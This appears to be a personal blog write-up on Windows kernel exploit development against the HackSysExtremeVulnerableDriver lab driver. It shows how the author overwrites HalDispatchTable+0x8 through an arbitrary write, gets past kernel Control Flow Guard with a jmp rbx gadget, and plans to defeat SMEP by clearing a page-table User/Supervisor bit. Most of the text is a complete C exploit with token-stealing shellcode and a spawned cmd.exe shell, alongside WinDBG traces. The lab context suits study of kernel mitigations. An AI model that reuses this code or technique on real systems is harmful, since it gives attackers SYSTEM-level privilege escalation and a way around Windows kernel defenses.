In old school exploit logic, this should have been the money shot:

NtQueryIntervalProfile
        |
        v
nt!NtQueryIntervalProfile
        |
        v
nt!KeQueryIntervalProfile
        |
        v
call qword ptr [HalDispatchTable + 0x8]
        |
        v
shellcode

But modern Windows had other plans.

Instead of jumping to the shellcode, the machine crashed with:

KERNEL_SECURITY_CHECK_FAILURE (139)

The interesting part was not just the bugcheck code. The important clue was this:

nt!guard_icall_bugcheck

That tells us the crash happened because a guarded indirect call failed validation.

This is where Kernel Control Flow Guard, or KCFG, enters the picture.

Control Flow Guard is a mitigation designed to stop attackers from abusing indirect calls. An indirect call is a call where the destination is not hardcoded directly into the instruction. Instead, the CPU gets the destination from a register or memory location.

For example:

call rax

or:

  
call qword ptr [some_table_entry]

That second style is exactly what makes dispatch tables interesting to exploit developers. If a kernel table contains a function pointer, and an attacker can overwrite that pointer, then the next indirect call through the table can become a control flow hijack.

That is the entire idea behind the classic HalDispatchTable technique. But KCFG changes the rules.

Instead of blindly trusting the function pointer, the kernel checks whether the indirect call target is valid before allowing execution to continue. If the target is not considered a valid kernel control flow destination, Windows does not call it. It bugchecks.

That is exactly what happened here. Our overwritten table entry pointed to user mode shellcode:

HalDispatchTable + 0x8 -> 000001ec`70f60000

With SMEP disabled, the CPU itself would not block kernel execution from a user page. So from a pure SMEP perspective, this looked fine. But KCFG is a different mitigation.

SMEP asks:

Is kernel mode trying to execute code from a user mode page?

KCFG asks:

Is this indirect call target a valid destination for this guarded kernel call?

Our shellcode address failed that second question. So even though SMEP was off, the kernel still refused to transfer execution to the payload. The crash happened before the shellcode had a chance to run. This distinction is important:

SMEP blocks execution based on page privilege.
KCFG blocks execution based on control flow validity.

Bypassing KCFG: Stop Pointing HAL Directly at Shellcode

Instead of writing the user-mode shellcode address directly into HalDispatchTable + 0x8, we write the address of a kernel gadget instead. In this case, the gadget is jmp rbx. When NtQueryIntervalProfile reaches the guarded HAL dispatch call, KCFG first sees a target inside ntoskrnl.exe, not a random user-mode shellcode page. The gadget then performs the second hop into our shellcode through RBX. So the kernel sees the gadget address instead of our user mode shellcode address and kCFG won’t cry about it. This is already implemented here as well.

Recall how we can search for the gadgets using ropper and hardcode the value in our code for this to work. But obviously I need to make it all dynamic. In the code the only thing worth explaining is that I’m reusing the read primitive to find the op code FF E3 that resolves to the gadget we are looking for.

The entire code that bypasses kCFG becomes this

  
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
#include <string.h>

#pragma comment(lib, "Psapi.lib")

#define QWORD ULONGLONG

#define HEVD_IOCTL_ARBITRARY_WRITE 0x22200B
#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

#define HALDISPATCHTABLE_FALLBACK_OFFSET 0xC00A60ULL
#define HAL_ENTRY_OFFSET 0x8ULL
#define ProfileTotalIssues 2

#define IMAGE_SCN_MEM_EXECUTE 0x20000000
#define JMP_RBX_BYTE_1 0xFF
#define JMP_RBX_BYTE_2 0xE3

typedef LONG NTSTATUS;

typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(
    ULONG ProfileSource,
    PULONG Interval
    );

typedef struct _WRITE_WHAT_WHERE
{
    QWORD* What;
    QWORD* Where;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

BOOL TriggerWriteWhatWhere(HANDLE hDevice, QWORD* what, QWORD* where)
{
    WRITE_WHAT_WHERE request = { 0 };

    request.What = what;
    request.Where = where;

    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
}

QWORD ReadQWORD(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD value = 0;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        (QWORD*)kernelAddress,
        &value
    );

    if (!ok)
    {
        printf("[-] ReadQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return value;
}

BOOL WriteQWORD(HANDLE hDevice, QWORD kernelAddress, QWORD valueToWrite)
{
    QWORD value = valueToWrite;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        &value,
        (QWORD*)kernelAddress
    );

    if (!ok)
    {
        printf("[-] WriteQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return ok;
}

BYTE ReadBYTE(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD alignedAddress = kernelAddress & ~0x7ULL;
    QWORD value = ReadQWORD(hDevice, alignedAddress);

    DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

    return (BYTE)((value >> shift) & 0xff);
}

WORD ReadWORD(HANDLE hDevice, QWORD kernelAddress)
{
    WORD value = 0;

    value |= (WORD)ReadBYTE(hDevice, kernelAddress);
    value |= (WORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;

    return value;
}

DWORD ReadDWORD(HANDLE hDevice, QWORD kernelAddress)
{
    DWORD value = 0;

    value |= (DWORD)ReadBYTE(hDevice, kernelAddress);
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 1) << 8;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 2) << 16;
    value |= (DWORD)ReadBYTE(hDevice, kernelAddress + 3) << 24;

    return value;
}

BOOL ReadKernelString(HANDLE hDevice, QWORD kernelAddress, char* buffer, DWORD maxLen)
{
    if (!buffer || maxLen == 0)
    {
        return FALSE;
    }

    for (DWORD i = 0; i < maxLen - 1; i++)
    {
        buffer[i] = (char)ReadBYTE(hDevice, kernelAddress + i);

        if (buffer[i] == '\0')
        {
            return TRUE;
        }
    }

    buffer[maxLen - 1] = '\0';
    return TRUE;
}

QWORD ResolveKernelExport(HANDLE hDevice, QWORD imageBase, const char* targetExport)
{
    WORD mz = ReadWORD(hDevice, imageBase);

    if (mz != 0x5A4D) // MZ
    {
        printf("[-] Invalid DOS header. Expected MZ, got 0x%04x\n", mz);
        return 0;
    }

    DWORD e_lfanew = ReadDWORD(hDevice, imageBase + 0x3c);
    QWORD ntHeaders = imageBase + e_lfanew;

    DWORD peSignature = ReadDWORD(hDevice, ntHeaders);

    if (peSignature != 0x00004550) // PE\0\0
    {
        printf("[-] Invalid PE signature. Got 0x%08lx\n", peSignature);
        return 0;
    }

    QWORD optionalHeader = ntHeaders + 0x18;

    WORD magic = ReadWORD(hDevice, optionalHeader);

    if (magic != 0x20b) // PE32+
    {
        printf("[-] Not a PE32+ image. OptionalHeader.Magic = 0x%04x\n", magic);
        return 0;
    }

    DWORD exportDirectoryRva = ReadDWORD(hDevice, optionalHeader + 0x70);

    if (!exportDirectoryRva)
    {
        printf("[-] Export directory RVA is NULL\n");
        return 0;
    }

    QWORD exportDirectory = imageBase + exportDirectoryRva;

    DWORD numberOfNames = ReadDWORD(hDevice, exportDirectory + 0x18);
    DWORD addressOfFunctionsRva = ReadDWORD(hDevice, exportDirectory + 0x1c);
    DWORD addressOfNamesRva = ReadDWORD(hDevice, exportDirectory + 0x20);
    DWORD addressOfNameOrdinalsRva = ReadDWORD(hDevice, exportDirectory + 0x24);

    QWORD addressOfFunctions = imageBase + addressOfFunctionsRva;
    QWORD addressOfNames = imageBase + addressOfNamesRva;
    QWORD addressOfNameOrdinals = imageBase + addressOfNameOrdinalsRva;

    printf("[+] Export directory:        0x%llx\n", exportDirectory);
    printf("[+] NumberOfNames:           %lu\n", numberOfNames);

    for (DWORD i = 0; i < numberOfNames; i++)
    {
        DWORD nameRva = ReadDWORD(
            hDevice,
            addressOfNames + (i * sizeof(DWORD))
        );

        QWORD nameAddress = imageBase + nameRva;

        char exportName[256] = { 0 };

        ReadKernelString(
            hDevice,
            nameAddress,
            exportName,
            sizeof(exportName)
        );

        if (strcmp(exportName, targetExport) == 0)
        {
            WORD ordinal = ReadWORD(
                hDevice,
                addressOfNameOrdinals + (i * sizeof(WORD))
            );

            DWORD functionRva = ReadDWORD(
                hDevice,
                addressOfFunctions + (ordinal * sizeof(DWORD))
            );

            QWORD functionAddress = imageBase + functionRva;

            printf("[+] Found export:            %s\n", exportName);
            printf("[+] Export ordinal:          %u\n", ordinal);
            printf("[+] Export RVA:              0x%lx\n", functionRva);
            printf("[+] Export address:          0x%llx\n", functionAddress);

            return functionAddress;
        }
    }

    printf("[-] Export not found: %s\n", targetExport);
    return 0;
}

QWORD ResolveHalDispatchTable(HANDLE hDevice, QWORD ntBase)
{
    QWORD halDispatchTable = 0;

    printf("[+] Trying dynamic HalDispatchTable export resolution...\n");

    halDispatchTable = ResolveKernelExport(
        hDevice,
        ntBase,
        "HalDispatchTable"
    );

    if (halDispatchTable)
    {
        printf("[+] Dynamic HalDispatchTable resolution succeeded\n");
        return halDispatchTable;
    }

    printf("[!] Dynamic HalDispatchTable resolution failed\n");
    printf("[!] Falling back to hardcoded WinDBG offset: 0x%llx\n",
        HALDISPATCHTABLE_FALLBACK_OFFSET
    );

    halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

    printf("[+] Fallback HalDispatchTable: 0x%llx\n", halDispatchTable);

    return halDispatchTable;
}

BOOL ReadKernelBytes(
    HANDLE hDevice,
    QWORD kernelAddress,
    BYTE* buffer,
    DWORD length
)
{
    if (!buffer || length == 0)
    {
        return FALSE;
    }

    for (DWORD i = 0; i < length; i++)
    {
        buffer[i] = ReadBYTE(hDevice, kernelAddress + i);
    }

    return TRUE;
}

void ReadSectionName(
    HANDLE hDevice,
    QWORD sectionHeader,
    char* nameBuffer,
    DWORD nameBufferSize
)
{
    if (!nameBuffer || nameBufferSize == 0)
    {
        return;
    }

    ZeroMemory(nameBuffer, nameBufferSize);

    DWORD maxName = min(8, nameBufferSize - 1);

    for (DWORD i = 0; i < maxName; i++)
    {
        nameBuffer[i] = (char)ReadBYTE(hDevice, sectionHeader + i);
    }

    nameBuffer[maxName] = '\0';
}

QWORD FindJmpRbxGadget(HANDLE hDevice, QWORD imageBase)
{
    WORD mz = ReadWORD(hDevice, imageBase);

    if (mz != 0x5A4D)
    {
        printf("[-] Invalid MZ header while searching for gadget\n");
        return 0;
    }

    DWORD e_lfanew = ReadDWORD(hDevice, imageBase + 0x3c);
    QWORD ntHeaders = imageBase + e_lfanew;

    DWORD peSignature = ReadDWORD(hDevice, ntHeaders);

    if (peSignature != 0x00004550)
    {
        printf("[-] Invalid PE signature while searching for gadget\n");
        return 0;
    }

    QWORD fileHeader = ntHeaders + 0x4;

    WORD numberOfSections = ReadWORD(hDevice, fileHeader + 0x2);
    WORD sizeOfOptionalHeader = ReadWORD(hDevice, fileHeader + 0x10);

    QWORD optionalHeader = ntHeaders + 0x18;
    QWORD firstSectionHeader = optionalHeader + sizeOfOptionalHeader;

    printf("[+] Searching executable sections for jmp rbx gadget...\n");
    printf("[+] Number of sections:      %u\n", numberOfSections);

    for (WORD i = 0; i < numberOfSections; i++)
    {
        QWORD sectionHeader = firstSectionHeader + ((QWORD)i * 0x28);

        char sectionName[9] = { 0 };
        ReadSectionName(hDevice, sectionHeader, sectionName, sizeof(sectionName));

        DWORD virtualSize = ReadDWORD(hDevice, sectionHeader + 0x8);
        DWORD virtualAddress = ReadDWORD(hDevice, sectionHeader + 0xC);
        DWORD characteristics = ReadDWORD(hDevice, sectionHeader + 0x24);

        if (!(characteristics & IMAGE_SCN_MEM_EXECUTE))
        {
            continue;
        }

        QWORD sectionStart = imageBase + virtualAddress;
        QWORD sectionEnd = sectionStart + virtualSize;

        printf("[+] Scanning section %-8s 0x%llx - 0x%llx\n",
            sectionName,
            sectionStart,
            sectionEnd
        );

        for (QWORD current = sectionStart; current < sectionEnd - 1; current++)
        {
            BYTE b1 = ReadBYTE(hDevice, current);
            BYTE b2 = ReadBYTE(hDevice, current + 1);

            if (b1 == JMP_RBX_BYTE_1 && b2 == JMP_RBX_BYTE_2)
            {
                printf("[+] Found possible jmp rbx gadget: 0x%llx\n", current);
                printf("[+] Gadget offset from nt base:    0x%llx\n", current - imageBase);

                return current;
            }
        }
    }

    printf("[-] No jmp rbx gadget found\n");
    return 0;
}

QWORD GetKernelBaseAddress(LPCWSTR driverName)
{
    LPVOID drivers[1024] = { 0 };
    DWORD cbNeeded = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded))
    {
        printf("[-] EnumDeviceDrivers failed. Error=%lu\n", GetLastError());
        return 0;
    }

    int driverCount = cbNeeded / sizeof(drivers[0]);

    for (int i = 0; i < driverCount; i++)
    {
        WCHAR currentDriverName[MAX_PATH] = { 0 };

        if (GetDeviceDriverBaseNameW(
            drivers[i],
            currentDriverName,
            MAX_PATH
        ))
        {
            if (_wcsicmp(currentDriverName, driverName) == 0)
            {
                return (QWORD)drivers[i];
            }
        }
    }

    return 0;
}

unsigned char shellcode[] = {
    0x9c, 0x53, 0x51, 0x52, 0x56, 0x57, 0x55, 0x41,
    0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41,
    0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x65,
    0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
    0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48,
    0x89, 0xc3, 0x49, 0x89, 0xc4, 0x4d, 0x8b, 0xa4,
    0x24, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xec,
    0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0xac, 0x24,
    0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xfd, 0x04,
    0x75, 0xe3, 0x4d, 0x8b, 0xac, 0x24, 0xb8, 0x04,
    0x00, 0x00, 0x49, 0x83, 0xe5, 0xf0, 0x4c, 0x8b,
    0xb3, 0xb8, 0x04, 0x00, 0x00, 0x49, 0x83, 0xe6,
    0x0f, 0x4d, 0x09, 0xf5, 0x4c, 0x89, 0xab, 0xb8,
    0x04, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41,
    0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41,
    0x59, 0x41, 0x58, 0x5d, 0x5f, 0x5e, 0x5a, 0x59,
    0x5b, 0x9d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc3
};

int main()
{
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    LPVOID shellcodeAddress = NULL;

    QWORD ntBase = 0;
    QWORD halDispatchTable = 0;
    QWORD halDispatchEntry = 0;
    QWORD originalHalEntry = 0;
    QWORD verifyHalEntry = 0;
    QWORD restoredHalEntry = 0;
    QWORD jmpRbxGadget = 0;

    HMODULE ntdll = NULL;
    NtQueryIntervalProfile_t NtQueryIntervalProfile = NULL;

    ULONG interval = 0;
    NTSTATUS status = 0;

    BOOL halOverwritten = FALSE;

    printf("[+] Opening device: %ls\n", DEVICE_NAME);

    hDevice = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFileW failed. Error=%lu\n", GetLastError());
        return 1;
    }

    ntBase = GetKernelBaseAddress(L"ntoskrnl.exe");

    if (!ntBase)
    {
        ntBase = GetKernelBaseAddress(L"ntkrnlmp.exe");
    }

    if (!ntBase)
    {
        printf("[-] Failed to find ntoskrnl.exe / ntkrnlmp.exe base\n");
        goto cleanup;
    }

    printf("[+] nt base:                 0x%llx\n", ntBase);

    halDispatchTable = ResolveHalDispatchTable(hDevice, ntBase);

    if (!halDispatchTable)
    {
        printf("[-] Failed to resolve HalDispatchTable\n");
        goto cleanup;
    }

    halDispatchEntry = halDispatchTable + HAL_ENTRY_OFFSET;

    printf("[+] HalDispatchTable:        0x%llx\n", halDispatchTable);
    printf("[+] HalDispatchTable + 0x8:  0x%llx\n", halDispatchEntry);

    shellcodeAddress = VirtualAlloc(
        NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (!shellcodeAddress)
    {
        printf("[-] VirtualAlloc failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    memcpy(shellcodeAddress, shellcode, sizeof(shellcode));

    printf("[+] Shellcode address:       0x%p\n", shellcodeAddress);

    ntdll = GetModuleHandleA("ntdll.dll");

    if (!ntdll)
    {
        printf("[-] GetModuleHandleA(ntdll.dll) failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    NtQueryIntervalProfile =
        (NtQueryIntervalProfile_t)GetProcAddress(
            ntdll,
            "NtQueryIntervalProfile"
        );

    if (!NtQueryIntervalProfile)
    {
        printf("[-] Failed to resolve NtQueryIntervalProfile. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    originalHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    if (!originalHalEntry)
    {
        printf("[-] Failed to read original HalDispatchTable entry\n");
        goto cleanup;
    }

    printf("[+] Original HAL entry:      0x%llx\n", originalHalEntry);

    printf("[+] Overwriting HalDispatchTable + 0x8...\n");

    jmpRbxGadget = FindJmpRbxGadget(hDevice, ntBase);

    if (!jmpRbxGadget)
    {
        printf("[-] Failed to find jmp rbx gadget dynamically\n");
        goto cleanup;
    }

    printf("[+] JMP RBX gadget:          0x%llx\n", jmpRbxGadget);

    if (!WriteQWORD(
        hDevice,
        halDispatchEntry,
        jmpRbxGadget
    ))
    {
        printf("[-] Failed to overwrite HalDispatchTable entry\n");
        goto cleanup;
    }

    halOverwritten = TRUE;

    verifyHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after write:   0x%llx\n", verifyHalEntry);

    if (verifyHalEntry != jmpRbxGadget)
    {
        printf("[-] HAL entry verification failed\n");
        goto cleanup;
    }

    printf("[+] Triggering NtQueryIntervalProfile...\n");

    printf("[+] About to trigger NtQueryIntervalProfile...\n");
    __debugbreak();

    status = NtQueryIntervalProfile(
        ProfileTotalIssues,
        (PULONG)shellcodeAddress
    );

    printf("[+] NtQueryIntervalProfile returned: 0x%lx\n", status);

    printf("[+] Restoring original HAL entry...\n");

    if (!WriteQWORD(hDevice, halDispatchEntry, originalHalEntry))
    {
        printf("[-] Failed to restore original HAL entry\n");
        goto cleanup;
    }

    halOverwritten = FALSE;

    restoredHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after restore: 0x%llx\n", restoredHalEntry);

    if (restoredHalEntry == originalHalEntry)
    {
        printf("[+] HAL entry restored successfully\n");
    }
    else
    {
        printf("[!] HAL entry restore verification mismatch\n");
    }

    printf("[+] Spawning cmd.exe\n");
    system("cmd.exe");

cleanup:

    if (halOverwritten && originalHalEntry)
    {
        printf("[!] Attempting emergency HAL entry restore...\n");
        WriteQWORD(hDevice, halDispatchEntry, originalHalEntry);
    }

    if (shellcodeAddress)
    {
        VirtualFree(shellcodeAddress, 0, MEM_RELEASE);
    }

    if (hDevice != INVALID_HANDLE_VALUE)
    {
        CloseHandle(hDevice);
    }

    return 0;
}

Running it works as expected.

SMEP: The Sequel Nobody Asked For

The VM this was being tested on until now did not have SMEP enabled. If this was run in a VM with SMEP what happens?

One thing to note, the dynamic finding of the gadget and HalDispatchTable was taking a long time and freezing the VM. I’ll find a way to fix this maybe by using a specific location to find or something just not now. But the problem is with our ReadBYTE it runs thousands of IOCTL calls in order to determine what its finding byte by byte which takes up a long time. I’m hardcoding the address for now. And im using hardware breakpoint instead of RVA just because I was getting issues with breaking at the right instruction.

Running this we see the following in WinDBG

0: kd> ba e 1 nt+0x44584a
0: kd> g
Breakpoint 0 hit
nt!MiRemoveFromSystemSpace+0x1c037e:
fffff802`51c4584a ffe3            jmp     rbx
1: kd> r
rax=fffff80251c4584a rbx=0000018bd6b70000 rcx=0000000000000001
rdx=0000000000000018 rsi=0000000000000048 rdi=0000000000000001
rip=fffff80251c4584a rsp=fffffc8096f17a68 rbp=fffffc8096f17b80
 r8=fffffc8096f17aa0  r9=fffffc8096f17ad0 r10=0000fffff80251c4
r11=ffff9bf924400000 r12=00007fff6626ffc0 r13=fffff80251c4584a
r14=fffff80252400a68 r15=fffff8025218f9d0
iopl=0         nv up ei pl nz ac po cy
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040213
nt!MiRemoveFromSystemSpace+0x1c037e:
fffff802`51c4584a ffe3            jmp     rbx {0000018b`d6b70000}
1: kd> u @rip L1
nt!MiRemoveFromSystemSpace+0x1c037e:
fffff802`51c4584a ffe3            jmp     rbx
1: kd> ? @cr4 & 100000
Evaluate expression: 1048576 = 00000000`00100000
1: kd> !pte @rbx
                                           VA 0000018bd6b70000
PXE at FFFF824120904018    PPE at FFFF824120803178    PDE at FFFF82410062F5A8    PTE at FFFF8200C5EB5B80
contains 0A000000B4D1B867  contains 0A000000B9C1C867  contains 0A000000ABA1D867  contains 00000000B099D867
pfn b4d1b     ---DA--UWEV  pfn b9c1c     ---DA--UWEV  pfn aba1d     ---DA--UWEV  pfn b099d     ---DA--UWEV

What does this mean. This means that our exploit is working. Our gadget is being resolved and RIP contains JMP RBX gadget as we wanted. The gadget is also pointing to our user mode shellcode address.

in runtime

Stepping into this we see

1: kd> t
0000026b`e6730000 9c              pushfq
1: kd> r
rax=fffff8056b24584a rbx=0000026be6730000 rcx=0000000000000001
rdx=0000000000000018 rsi=000000000000009c rdi=0000000000000001
rip=0000026be6730000 rsp=fffff50a22e3ea68 rbp=fffff50a22e3eb80
 r8=fffff50a22e3eaa0  r9=fffff50a22e3ead0 r10=0000fffff8056b24
r11=ffffa378ef800000 r12=00007ffe3a2effc0 r13=fffff8056b24584a
r14=fffff8056ba00a68 r15=fffff8056b78f9d0
iopl=0         nv up ei pl nz ac pe cy
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040217
0000026b`e6730000 9c              pushfq

Note that RIP contains our user mode shellcode address but CS shows 0010 which is kernel mode. So kernel mode (CPL=0) is calling our user mode shellcode. Which should be blocked by SMEP.

1: kd> t
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc
                       (0x0000026BE6730000,0x000000002D0BD867,0xFFFFF50A22E3E8D0,0x0000000080000005)

WARNING: This break is not a step/trace completion.
The last command has been cleared to prevent
accidental continuation of this unrelated event.
Check the event, location and thread before resuming.
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`6b206f80 cc              int     3

Recall back, ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY is the result of the 0XFC error that is showing here which means SMEP is blocking the execution.

PTEs: Gaslighting SMEP

I’ll be honest. I don’t fully understand the structure. It all makes my mind hurt. But this is explained much better here and here.

In the previous stack overflow exploit, SMEP was handled with a ROP chain. Since we controlled the stack, the solution was straightforward: build a small chain that loaded a modified CR4 value and executed a mov cr4, reg gadget. That cleared bit 20 of CR4, disabling SMEP globally, and then execution could safely continue into user-mode shellcode.

That approach made sense for a stack overflow because the vulnerability naturally gave us stack control. We had room for a chain: gadget, value, gadget, shellcode address, and so on.

The arbitrary write primitive is different. Here, we are not starting with a controlled stack. We have something even more direct: the ability to read and write kernel memory. So instead of building a ROP chain to disable SMEP, we can attack the page metadata itself. This is where Page Table Entry overwrite comes in.

When SMEP blocked our exploit, the failure was very clear. The kCFG bypass worked. The overwritten HalDispatchTable+0x8 entry reached a valid ntoskrnl.exe gadget, and that gadget executed jmp rbx. At that moment, RBX contained the address of our shellcode. After stepping over the gadget, RIP pointed directly at the user-mode shellcode page while CS=0010, meaning the CPU was still executing in kernel mode. The crash happened only when the CPU tried to execute code from that user page.

So kCFG was not the blocker anymore. SMEP was. The reason SMEP complained is that our shellcode lived in a user-mode page. WinDBG’s !pte output showed the U bit set, meaning the page was marked as user-accessible. SMEP sees that and says: kernel mode is not allowed to execute this page.

Instead of disabling SMEP globally, we can make the shellcode page look like supervisor memory. We do that by finding the shellcode page’s PTE and clearing the User/Supervisor bit, bit 2.

The virtual address of the shellcode does not change. The shellcode bytes do not change. The kCFG bypass does not change. The only thing that changes is the page-table metadata describing that address.

Before the overwrite, the page looks like this conceptually:

Shellcode VA → PTE says: valid, writable, executable, user page

After the overwrite:

Shellcode VA → PTE says: valid, writable, executable, supervisor page

Now when the same jmp rbx gadget transfers execution to the shellcode, SMEP no longer treats the target as a user-mode page. We did not turn SMEP off. We simply changed the page so that SMEP’s own rules allow execution.

That is why PTE overwrite fits this vulnerability better than CR4 flipping. A stack overflow gives us ROP. A write-what-where gives us memory corruption. So instead of fighting SMEP through a ROP chain, we use our arbitrary write to edit the shellcode page’s PTE directly.

The exploit flow now becomes:

Allocate user-mode shellcode.
Resolve nt base.
Resolve HalDispatchTable+0x8.
Find a valid kCFG-safe jmp rbx gadget in ntoskrnl.exe.
Resolve the PTE base using MiGetPteAddress-style logic.
Calculate the shellcode page’s PTE.
Read the original PTE.
Clear the U/S bit.
Write the modified PTE back.
Overwrite HalDispatchTable+0x8 with the jmp rbx gadget.
Trigger NtQueryIntervalProfile.
Execution reaches the kernel gadget, jumps to shellcode, and SMEP no longer blocks it.

This is the important mental shift: in the stack overflow exploit, we bypassed SMEP by changing the CPU control register. In the arbitrary write exploit, we bypass SMEP by changing how the memory page is classified.

Making Userland Look Like It Belongs Here

At this point in the exploit, kCFG was no longer the blocker. We had already proven that the overwritten HalDispatchTable+0x8 entry reached a valid kernel gadget:

HalDispatchTable+0x8 → nt!jmp rbx

The gadget executed in kernel mode, and RBX contained the address of our user-mode shellcode. The problem happened after the gadget executed. jmp rbx moved RIP to the user-mode shellcode page while the CPU was still running in kernel mode. Since SMEP was enabled, the processor refused to execute that user page and crashed with bugcheck 0xFC.

So the control-flow part was working:

kCFG bypass: working
jmp rbx gadget: working
RBX points to shellcode: working
SMEP: blocking execution

The fix is not to remove the kCFG bypass. The fix is to change how the shellcode page is viewed by the CPU. SMEP blocks kernel-mode execution from pages marked as user pages. That marking lives in the page table. More specifically, it lives in the Page Table Entry, or PTE, for the virtual address we want to execute.

A PTE is an 8-byte structure used by the CPU’s paging mechanism. It maps a virtual page to a physical page and stores permission bits for that mapping. Those bits describe things like whether the page is valid, writable, user-accessible, or non-executable.

For this exploit, the important PTE bits are:

Bit 0  - Valid / Present
Bit 1  - Writeable
Bit 2  - User / Supervisor
Bit 63 - NX / No Execute

The bit we care about for SMEP is bit 2, the User/Supervisor bit. When bit 2 is set, the page is a user page:

PTE bit 2 = 1 → user page

When bit 2 is clear, the page is a supervisor page:

PTE bit 2 = 0 → supervisor/kernel page

SMEP does not simply look at the numeric address and say, “this looks like userland.” It checks the page-table permissions. If the CPU is executing in kernel mode and the target page is marked as user, SMEP blocks it.

That gives us a nice workaround. Instead of disabling SMEP globally by flipping CR4 bit 20, we modify the PTE for our shellcode page and clear the User/Supervisor bit. Now, when the same jmp rbx gadget transfers execution to the shellcode page, SMEP no longer blocks it because the page is no longer marked as a user page.

To calculate the PTE for a virtual address, we need the Windows PTE base. In WinDBG, this can be seen in two places:

nt!MmPteBase
nt!MiGetPteAddress+0x13

MiGetPteAddress is especially useful because it contains the exact logic Windows uses to calculate the PTE address for a virtual address. The disassembly looked like this:

nt!MiGetPteAddress:
shr rcx, 9
mov rax, 7FFFFFFFF8h
and rcx, rax
mov rax, 0FFFF858000000000h
add rax, rcx
ret

Translated into C, that logic is:

  
PTE = PteBase + ((VirtualAddress >> 9) & 0x7FFFFFFFF8);

So the code adds this helper:

  
QWORD GetPteAddress(QWORD virtualAddress, QWORD pteBase)
{
    return pteBase + ((virtualAddress >> 9) & 0x7FFFFFFFF8ULL);
}

The value 0xFFFF858000000000 is the PTE base on this target. Instead of hardcoding that full value, the exploit reads it from the live kernel using the arbitrary read primitive.

The WinDBG values were:

nt!MiGetPteAddress+0x13 - nt = 0x298793
nt!MmPteBase - nt             = 0xCFB358

So the code defines these values. And yes we are hardcoding them. I don’t want to fall down more rabbit holes trying to find if I can dynamically resolve them:

#define MIGETPTEADDRESS_PTEBASE_RVA 0x00298793ULL
#define MMPTEBASE_RVA               0x00CFB358ULL

Then it reads both values from kernel memory:

  
pteBaseFromMiGet = ReadQWORD(hDevice, ntBase + MIGETPTEADDRESS_PTEBASE_RVA);
pteBaseFromMmPteBase = ReadQWORD(hDevice, ntBase + MMPTEBASE_RVA);

Both should resolve to the same PTE base. In this case:

0xFFFF858000000000

Reading both is useful because it gives us a sanity check. If both values match, we can be more confident that the PTE base is correct.

Once the shellcode is allocated with VirtualAlloc, we have a user-mode virtual address:

  
shellcodeAddress = VirtualAlloc(
    NULL,
    sizeof(shellcode),
    MEM_COMMIT | MEM_RESERVE,
    PAGE_EXECUTE_READWRITE
);

The page is executable because we used PAGE_EXECUTE_READWRITE, but it is still a user-mode page. That means SMEP will block it if kernel mode tries to execute it.

The new code calculates the PTE address for this shellcode page:

  
QWORD shellcodePteAddress = GetPteAddress(
    (QWORD)shellcodeAddress,
    pteBase
);

Then it reads the original PTE:

  
QWORD originalPte = ReadQWORD(hDevice, shellcodePteAddress);

At this point, the PTE should describe a valid, user-accessible, executable page. The code defines the important PTE permission bits:

#define PTE_VALID_BIT             0x1ULL
#define PTE_WRITE_BIT             0x2ULL
#define PTE_USER_SUPERVISOR_BIT   0x4ULL
#define PTE_NX_BIT                0x8000000000000000ULL

